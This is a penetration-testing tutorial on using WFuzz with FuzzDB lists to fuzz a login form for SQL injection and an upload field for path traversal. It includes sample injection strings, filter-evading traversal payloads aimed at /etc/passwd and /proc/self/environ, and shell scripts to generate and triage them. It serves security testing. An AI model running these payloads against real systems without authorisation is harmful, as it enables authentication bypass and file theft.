Using wfuzz and fuzzdb (step-by-step)

Using WFuzz and FuzzDB together can significantly enhance your web application testing capabilities. Here are two in-depth, step-by-step examples demonstrating how to use these tools effectively to uncover vulnerabilities.

Example: Testing for SQL Injection in a Login Form

Step 1: Setup and Preparation

Install WFuzz and Download FuzzDB: Ensure both tools are installed and properly configured. WFuzz can be installed using pip (e.g., pip install wfuzz), and FuzzDB can be cloned from its GitHub repository.

Identify the Target: Locate the login form you want to test for SQL injection vulnerabilities. For this example, assume the target URL is http://example.com/login.

Analyze the Form: Use browser developer tools to analyze the login form and identify the input fields. Let's assume the form has username and password fields and submits data via POST.

Step 2: Crafting the WFuzz Command

Construct the Base WFuzz Command: Start with the shape of the request, a POST to the login endpoint with FUZZ marking the parameter under attack. WFuzz refuses to run until a payload source (-w or -z) is supplied, so this is only the skeleton that the next step completes:

wfuzz -u http://example.com/login -d "username=FUZZ&password=test"

Incorporate FuzzDB Payloads: Use FuzzDB's SQL injection lists, which live under fuzzdb/attack/sql-injection/ (split into detect/ and exploit/ subdirectories, with generic and database-specific files). The commands below use payloads.txt as a placeholder file name; substitute the list you choose. -w is shorthand for -z file,<path>. WFuzz inserts each payload verbatim, so when a list contains characters such as &, # or + that would break the POST body, use -z file,<path>,urlencode instead so the payload is encoded before it is sent:

wfuzz -u http://example.com/login -d "username=FUZZ&password=test" -w /path/to/fuzzdb/attack/sql-injection/payloads.txt

Handle HTTP Responses: Add filters to hide the uninteresting responses. WFuzz's hide options act on status code (--hc), line count (--hl), word count (--hw) and character count (--hh); the matching --sc/--sl/--sw/--sh options show only responses that match. Take the number from a baseline run (send a harmless username first and note the failed-login page's lines, words and characters) rather than guessing it. In the command below, --hl 200 hides every response with 200 lines, where 200 stands in for the line count of your baseline failed-login page:

wfuzz -u http://example.com/login -d "username=FUZZ&password=test" -w /path/to/fuzzdb/attack/sql-injection/payloads.txt --hl 200

Step 3: Running the Attack and Analyzing Results

Execute the Command: Run the crafted WFuzz command. WFuzz substitutes each line of the FuzzDB list into the username parameter, one request per payload, and prints one result line per request with its status code and its line, word and character counts.

wfuzz -u http://example.com/login -d "username=FUZZ&password=test" -w /path/to/fuzzdb/attack/sql-injection/payloads.txt --hl 200

Analyze the Output: Look for responses that differ from the baseline. A different status code (a 302 redirect where failed logins return 200, or a 500 from a database error) or a different line, word or character count marks a payload that changed the application's behaviour and needs manual confirmation in the proxy. -o selects the printer used for standard output (csv, json, html and others); to keep a copy for later analysis, add -f results.csv,csv, which writes the results to a file with the named printer:

wfuzz -u http://example.com/login -d "username=FUZZ&password=test" -w /path/to/fuzzdb/attack/sql-injection/payloads.txt --hl 200 -o csv

Tips for Better Performance

Route your traffic through a proxy like Burp Suite (-p 127.0.0.1:8080 for Burp's default listener) to capture and analyze each request and response in detail.

Customize FuzzDB payloads based on the specific database backend you suspect the application uses. FuzzDB ships separate detection lists for individual engines (MySQL and MSSQL among them) next to the generic ones, and comment and quoting syntax differ between engines, so a generic list wastes requests and can miss the one string the backend actually accepts.

Avoid overwhelming the server: -t sets the number of concurrent connections (the default is 10) and -s adds a delay in seconds between requests. The rate matters for correctness as well as courtesy, because timeouts and rate-limiting responses look exactly like anomalies and pollute the results:

wfuzz -u http://example.com/login -d "username=FUZZ&password=test" -w /path/to/fuzzdb/attack/sql-injection/payloads.txt --hl 200 -t 5
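Once a run has been saved with -f results.csv,csv, the anomaly check from Step 3 can be automated. The following is an added example, not code from the original post: a POSIX shell script that finds the baseline response (the most frequent status-code and size pair, which for a login form is the failed-login page) and lists every payload that deviates from it. The CSV column order is assumed from WFuzz's csv printer, the results.csv file name is hypothetical, and the sample rows are constructed for illustration rather than captured from a real target.

```shell
#!/bin/sh
# Added example, not code from the original post: triage the CSV that wfuzz
# writes for the login-form test (-f results.csv,csv). Column order is assumed
# from wfuzz's csv printer: id,response,lines,word,chars,request,success.
# Most SQL injection payloads land on the same "login failed" page, so the most
# frequent (code, chars) pair is the baseline; anything else deserves a look.
set -eu

# Constructed sample standing in for real wfuzz output (results.csv is a
# hypothetical file name). Row 5 shows how the csv printer quotes a payload
# that itself contains commas.
SAMPLE_CSV=$(mktemp)
trap 'rm -f "$SAMPLE_CSV"' EXIT
cat > "$SAMPLE_CSV" <<'EOF'
id,response,lines,word,chars,request,success
0,200,41,133,1587,admin,1
1,200,41,133,1587,admin' --,1
2,500,12,40,612,admin' OR 1=1--,1
3,200,41,133,1587,admin' AND 1=2--,1
4,302,0,0,0,' OR '1'='1,1
5,200,43,140,1640,"1 UNION SELECT 1,2,3--",1
EOF

# Print the most frequent "code chars" pair in the file: the baseline response.
baseline_of() {   # $1 = wfuzz csv file
    awk -F, 'NR > 1 { n[$2 " " $5]++ }
             END { for (k in n) if (n[k] > best) { best = n[k]; key = k }; print key }' "$1"
}

# Print every payload whose status code or byte count differs from the baseline.
# Only the first five columns are split on commas, so payloads that contain
# commas (which the csv printer wraps in quotes) survive intact.
outliers() {      # $1 = wfuzz csv file
    set -- "$1" $(baseline_of "$1")   # $2 = baseline code, $3 = baseline chars
    awk -F, -v bcode="$2" -v bchars="$3" '
        NR > 1 && ($2 != bcode || $5 != bchars) {
            line = $0
            for (i = 1; i <= 5; i++) sub(/^[^,]*,/, "", line)   # drop id..chars
            sub(/,[01]$/, "", line)                               # drop success flag
            printf "code=%s chars=%s payload=%s\n", $2, $5, line
        }' "$1"
}

# The wfuzz run that would produce the real input (not executed here; the
# payload file name is the page's placeholder):
#   wfuzz -z file,/path/to/fuzzdb/attack/sql-injection/payloads.txt,urlencode \
#         -d "username=FUZZ&password=test" -f results.csv,csv http://example.com/login
echo "baseline (code chars): $(baseline_of "$SAMPLE_CSV")"
outliers "$SAMPLE_CSV"
```

On the constructed sample the baseline is 200/1587 bytes and three payloads stand out: the 500 from a broken query, the 302 that suggests an authentication bypass, and a 200 whose size changed. Treat the list as a queue for manual verification in the proxy, not as confirmed findings.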

Example: Fuzzing a File Upload Functionality for Path Traversal

Step 1: Setup and Preparation

Install WFuzz and Download FuzzDB: Ensure both tools are installed and configured as described in the first example.

Identify the Target: Locate the file upload functionality. Assume the target URL is http://example.com/upload.

Analyze the Form: Use browser developer tools to analyze the file upload form. Identify the input field for the file and other required parameters.

Step 2: Crafting the WFuzz Command

Construct the Base WFuzz Command: Start with a POST to the upload endpoint. Note that the @file syntax belongs to curl, not WFuzz: WFuzz sends the -d string verbatim, so file=@FUZZ would submit a literal @ followed by the payload. Assume instead that the endpoint accepts the destination file name in a form field named file:

wfuzz -u http://example.com/upload -d "file=FUZZ"

If the name is only accepted inside a multipart body (the filename="..." attribute of the part's Content-Disposition header), build that body yourself, set the matching Content-Type header with its boundary via -H, and place FUZZ inside the filename attribute; confirm in the proxy that the body arrives as intended.

Use FuzzDB's path traversal payloads from fuzzdb/attack/path-traversal/ (the commands below use Linux/paths.txt as the file name; substitute the list in your checkout that matches the target OS). If the list you pick already contains percent-encoded variants, do not add the urlencode encoder, or they will be encoded a second time. Modify the command to include the payload file:

wfuzz -u http://example.com/upload -d "file=FUZZ" -w /path/to/fuzzdb/attack/path-traversal/Linux/paths.txt

Handle HTTP Responses: Add filters for the interesting responses. --sc 200 shows only responses with status 200, hiding the 4xx/5xx a rejected name usually produces. Keep in mind that a traversal that succeeds can return the same 200 as an ordinary upload, so also compare sizes against a baseline upload (--hh with the baseline character count) and do not hide 500s outright, since they may carry file-system error messages that expose the resolved path:

wfuzz -u http://example.com/upload -d "file=FUZZ" -w /path/to/fuzzdb/attack/path-traversal/Linux/paths.txt --sc 200

Step 3: Running the Attack and Analyzing Results

Execute the Command: Run the crafted WFuzz command. WFuzz substitutes each traversal payload from FuzzDB into the file parameter, one request per line of the list.

wfuzz -u http://example.com/upload -d "file=FUZZ" -w /path/to/fuzzdb/attack/path-traversal/Linux/paths.txt --sc 200

Analyze the Output: A 200 on its own is weak evidence. Look for responses whose size or body differs from a normal upload, error messages that echo a resolved path, and, most conclusively, a file that appears outside the intended upload directory; a download or listing endpoint that later reads the same name is often where the traversal actually takes effect. -o html renders the results as a page on standard output, and -f results.html,html writes the same report to a file:

wfuzz -u http://example.com/upload -d "file=FUZZ" -w /path/to/fuzzdb/attack/path-traversal/Linux/paths.txt --sc 200 -o html

Tips for Better Performance

Create an intermediate wordlist rather than fuzzing FuzzDB's bare traversal prefixes: combine each prefix, at several depths, with the files you actually want to reach (/etc/passwd, the application's configuration file), so that every request carries a complete path and a hit is unambiguous.

Mix different types of payloads from FuzzDB (plain, URL-encoded and double-encoded traversal forms, Windows as well as Linux separators) to cover more attack vectors and more of the decoding paths the application may take.

If possible, monitor server logs for detailed insights into how the application handles each payload.
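The intermediate wordlist described in the tips above, as an added example that is not code from the original post: a POSIX shell script that multiplies a handful of traversal forms by a list of target files at increasing directory depth and prints one complete path per line, ready for -w. The traversal forms and target files are constructed here rather than read from FuzzDB's lists, and the WFuzz invocation in the comment assumes the file=FUZZ form field from the upload example.

```shell
#!/bin/sh
# Added example, not code from the original post: build the intermediate
# wordlist the tip above describes. FuzzDB's traversal lists are mostly bare
# prefixes; multiplying a few traversal forms by the files you actually want
# to read, at increasing depth, gives wfuzz one complete path per request.
set -eu

# Constructed inputs (not FuzzDB's files). Each form is repeated once per
# directory level: "....//" survives filters that strip a single "../", and
# the %2f / %252f forms target decoders that run once or twice.
TRAVERSAL_FORMS='../
..%2f
....//
..%252f'

# Target files on a Linux host, without the leading slash (the prefix ends in one).
TARGET_FILES='etc/passwd
etc/hosts
proc/self/environ'

# Print one payload per line: every form repeated 1..$1 times, then every target.
gen_traversal() {   # $1 = maximum depth
    printf '%s\n' "$TRAVERSAL_FORMS" | while IFS= read -r form; do
        prefix=""
        depth=1
        while [ "$depth" -le "$1" ]; do
            prefix="$prefix$form"
            printf '%s\n' "$TARGET_FILES" | while IFS= read -r target; do
                printf '%s%s\n' "$prefix" "$target"
            done
            depth=$((depth + 1))
        done
    done
}

# Number of payloads a given depth produces (forms x depths x targets).
payload_count() {   # $1 = maximum depth
    gen_traversal "$1" | wc -l | tr -d ' '
}

# Write the list and fuzz the upload's file-name field with it (not executed
# here). Do not add wfuzz's urlencode encoder: the list already carries its
# encodings, and encoding again would turn ..%2f into ..%252f.
#   gen_traversal 6 > traversal.txt
#   wfuzz -w traversal.txt -d "file=FUZZ" --sc 200 -p 127.0.0.1:8080 http://example.com/upload
gen_traversal 2
```

Depth 6 with these inputs yields 72 payloads (4 forms, 6 depths, 3 targets), which is small enough to run at -t 5 without stressing the server; add target files or forms rather than depth when you need more coverage, since few applications nest deeper than a handful of directories.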

These examples illustrate how to effectively combine WFuzz and FuzzDB. Understanding and customizing each step can uncover a wide range of vulnerabilities in web applications.
